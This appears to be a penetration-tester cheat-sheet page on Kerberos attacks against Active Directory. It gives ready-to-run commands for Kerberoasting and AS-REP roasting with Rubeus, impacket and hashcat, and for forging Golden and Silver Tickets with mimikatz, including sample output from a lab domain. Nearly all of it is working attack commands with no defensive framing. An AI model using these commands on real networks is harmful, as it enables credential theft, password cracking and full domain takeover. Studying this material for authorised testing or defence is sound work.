Kerberos Attacks

Relationships and Attack paths

We can use bloodhound to find hidden relationships and attack paths in an Active Directory environment.

From the data collect we can escalate our privilege to the target, or use tools like aclpwn.

Kerberoasting

The AD Powershell module can be used to search for users with SPN

Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose Get-ADUser -LdapFilter "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))" | Format-Table Name, DistinguishedNam

Using Nmap:

nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'

Using Rubeus to gain hashes:

Rubeus.exe kerberoast /outfile:hashes.txt

Use the hashcat -m 13100 (Kerberos 5 TGS-REP etype 23) to crack:

hashcat -a 0 -m 13100 SPN.hash /wordlists/rockyou.txt

Using impacket:

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

https://newerasec.com/kerberoasting/

AS-RES

Find users with pre-auth enabled using the AD Powershell module :

Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

To exploit run:

.\Rubeus.exe asreproast

Impacket:

# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

https://newerasec.com/as-roast/

Golden Ticket

Once you gained the krbtgt hash (from dcsync or DC compromise)T

The Mimikatz kerberos::golden module handles Golden Tickets

We need the following parameters:

  • /domain - name of the domain

  • /sid - the sid of the domain (can be obtain from 'whoami /user' , remember to remove the RID)

  • /rc4 - the NTLM hash of krbtgt

  • /user - the user you want to create the new TGT ticket for

  • /id - the RIF of that user you looking to create ticket for

  • /ptt - (Optional) inject the new ticket into the current session, if not applied the ticket will be saved to a file

mimikatz # kerberos::golden /domain:eth.lab /sid:S-1-5-21-98033113-2199257571-2188946577 /rc4:88a4507aae31297a2df7921b1430d781 /user:Administrator /id:500  /ptt
User      : Administrator
Domain    : eth.lab (ETH)
SID       : S-1-5-21-98033113-2199257571-2188946577
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 88a4507aae31297a2df7921b1430d781 - rc4_hmac_nt
Lifetime  : 06/04/2020 14:05:45 ; 04/04/2030 14:05:45 ; 04/04/2030 14:05:45
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ eth.lab' successfully submitted for current session

Silver Ticket

use the 'kerberos::golden' module to forge TGS, we will need to pass the following parameters:

  • /domain: The FDQN

  • /sid: The SID (Security Identifier) of the Domain (whoami /user)

  • /user: Target Account/Computer to Impersonate

  • /id: RID of the account you will be impersonating

  • /ptt: Optional ( will automatically inject the ticket into the current session)

  • /rc4: NTLM Hash of User Password/Computer Password

  • /service: the service we want to access

Example:

mimikatz # kerberos::golden /sid:S-1-5-21-98033113-2199257571-2188946577-500 /domain:eth.lab /ptt /id:500 /target:WIN-EU4DLP9KRRC.eth.lab /service:cifs /rc4:0c0d4252608be9131c2826a6feaf94b8 /user:Administrator
User      : Administrator
Domain    : eth.lab (ETH)
SID       : S-1-5-21-98033113-2199257571-2188946577-500
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 0c0d4252608be9131c2826a6feaf94b8 - rc4_hmac_nt
Service   : cifs
Target    : WIN-EU4DLP9KRRC.eth.lab
Lifetime  : 03/04/2020 17:00:01 ; 01/04/2030 17:00:01 ; 01/04/2030 17:00:01
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ eth.lab' successfully submitted for current session
PreviousSMB VulnerabilitiesNextPrivilege Escalation

Last updated